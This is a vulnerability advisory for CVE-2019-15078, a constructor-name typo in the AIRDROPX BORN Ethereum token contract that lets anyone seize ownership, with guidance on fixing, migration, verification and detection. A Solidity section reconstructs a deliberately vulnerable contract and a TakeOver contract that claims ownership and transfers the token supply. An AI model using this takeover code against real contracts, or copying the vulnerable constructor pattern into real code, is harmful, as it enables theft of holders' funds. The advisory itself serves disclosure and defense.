CVE-2019-15078

7.5 HIGH

📋 TL;DR

A typo in the constructor name of the AIRDROPX BORN Ethereum smart contract lets any caller become the contract owner and steal tokens. Anyone holding or transacting with the affected deployment is exposed. The contract relies on the legacy Solidity convention (deprecated in 0.4.22, removed in 0.5.0) under which a function is the constructor only if its name exactly matches the contract name. Solidity identifiers are case-sensitive, so the mis-cased function is compiled as an ordinary public function: it never runs at deployment and can be invoked by anyone afterwards.

💻 Affected Systems

Products:
  • AIRDROPX BORN Ethereum token smart contract
Versions: All deployments through 2019-05-29
Operating Systems: N/A - Smart contract vulnerability
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects specific contract deployments with the typo. Not a vulnerability in Ethereum itself or other tokens.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete loss of all tokens and funds the contract controls: the attacker holds the owner role and can exercise every owner-only function the contract exposes.

🟠 Likely Case

Attacker claims contract ownership and takes whatever the owner role grants access to, rendering the token worthless for legitimate holders.

🟢 If Mitigated

No impact if holders have migrated to a corrected contract before the vulnerable one is exploited.

🌐 Internet-Facing: HIGH - Ethereum smart contracts are inherently internet-facing and publicly accessible.
🏢 Internal Only: LOW - This is a public blockchain vulnerability, not an internal network issue.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires only the ability to send an Ethereum transaction. Because the mis-cased function is an ordinary public function rather than a constructor, any account can call it after deployment and the contract records that caller as owner. No prior ownership, signature or private data is needed, and the call can be repeated by later callers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Contracts deployed after 2019-05-29 with corrected constructor name

Vendor Advisory: https://github.com/smsecgroup/SM-VUL/tree/master/typo-vul-00

Restart Required: No

Instructions:

1. Deploy a new contract whose constructor actually runs at deployment. Fixing the name (XBORNID) is the minimal correction; the robust form is to compile with Solidity 0.4.22 or later and declare the constructor with the `constructor` keyword, which cannot be mis-named and has no selector to call after deployment.
2. Migrate all token holders to the new contract.
3. Abandon the vulnerable contract.

Note: Smart contracts are immutable once deployed, so the existing bytecode cannot be patched in place.
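To make the bug class concrete, the following is an added, illustrative reconstruction of the pattern beside its hardened form. It is not the deployed AIRDROPX BORN source (this page does not reproduce it) and it covers both the takeover described under Exploit Status and step 1 of the fix above. Only the contract name XBORNID and the mis-cased function XBornID come from the advisory; owner, totalSupply, balanceOf, mint, transfer, TakeOver and XBORNIDFixed are assumed names chosen for the example.

```solidity
pragma solidity ^0.4.24;

// Illustrative reconstruction of the bug class, not the deployed AIRDROPX BORN
// source. All names other than XBORNID / XBornID are assumptions.

contract XBORNID {
    address public owner;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;

    // Intended as the legacy, name-based constructor. The compiler treats a
    // function as the constructor only when its name is exactly the contract
    // name; "XBornID" != "XBORNID", so this is an ordinary public function.
    // It does not run at deployment (owner stays 0x0, totalSupply stays 0),
    // and any account can call it at any time, as often as it likes.
    function XBornID() public {
        owner = msg.sender;
        totalSupply = 1000000 * 10 ** 18;
        balanceOf[msg.sender] = totalSupply; // every caller is handed the full supply
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    // Whatever owner-only functionality exists falls to the last caller of XBornID().
    function mint(address to, uint256 amount) public onlyOwner {
        totalSupply += amount;
        balanceOf[to] += amount;
    }

    function transfer(address to, uint256 value) public returns (bool) {
        require(balanceOf[msg.sender] >= value, "insufficient balance");
        balanceOf[msg.sender] -= value;
        balanceOf[to] += value;
        return true;
    }
}

// The takeover is a single public call from any address; no prior rights needed.
contract TakeOver {
    function run(XBORNID target) public {
        target.XBornID();                        // owner = address(this), full supply credited
        target.mint(msg.sender, 1);              // now passes onlyOwner
        target.transfer(msg.sender, target.balanceOf(address(this)));
    }
}

// Hardened form: the constructor keyword (Solidity >= 0.4.22) is not matched by
// name, runs exactly once at deployment, and exposes no selector to call later.
contract XBORNIDFixed {
    address public owner;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;

    constructor() public {
        owner = msg.sender;                      // set by the deployer, once
        totalSupply = 1000000 * 10 ** 18;
        balanceOf[msg.sender] = totalSupply;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function mint(address to, uint256 amount) public onlyOwner {
        totalSupply += amount;
        balanceOf[to] += amount;
    }
}
```

Deploying XBORNID above and then calling `TakeOver.run(target)` from any account leaves `target.owner()` equal to the TakeOver contract; against XBORNIDFixed there is no equivalent call, because the constructor is not part of the runtime bytecode. Compiling the same source with Solidity 0.5 or later would additionally reject any remaining name-based constructor outright.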

🔧 Temporary Workarounds

Contract migration (applies to: all affected deployments)

Create a new, corrected contract and transfer all holdings to it.

Command/config: N/A - requires manual smart contract deployment

🧯 If You Can't Patch

  • Immediately stop using the vulnerable token for transactions
  • Monitor contract for unauthorized ownership changes and alert holders

🔍 How to Verify

Check if Vulnerable:

Inspect the verified contract source (for example on Etherscan) for a function whose name matches the contract name only case-insensitively, 'XBornID' inside contract 'XBORNID', and that assigns the owner. If the contract exposes a public owner field, a zero address immediately after deployment, or an owner that changes without an owner-initiated transfer, confirms the function was never run as a constructor.

Check Version:

Check the contract's deployment date and the function signatures of the verified source on Etherscan; there is no version string to query on-chain.

Verify Fix Applied:

Verify that the replacement contract declares its constructor with the `constructor` keyword (or, at minimum, with a name exactly matching the contract name), that the owner field was set to the deployer in the deployment transaction, and that the runtime bytecode exposes no public function that assigns the owner to an arbitrary caller.

📡 Detection & Monitoring

Log Indicators:

  • Unexpected contract ownership transfer events (if the contract emits them)
  • Transactions invoking the mis-cased function (XBornID()) on the deployed contract at any point after deployment

Network Indicators:

  • Transactions to the vulnerable contract address whose call data selects the mis-cased function rather than a token transfer

SIEM Query:

Ethereum event monitoring for OwnershipTransferred events from the vulnerable address. Caveat: a mis-named constructor typically assigns the owner directly without emitting any event, so also poll the public owner getter on a schedule and alert on any change, and alert on any call to the mis-cased function's selector regardless of whether an event follows.
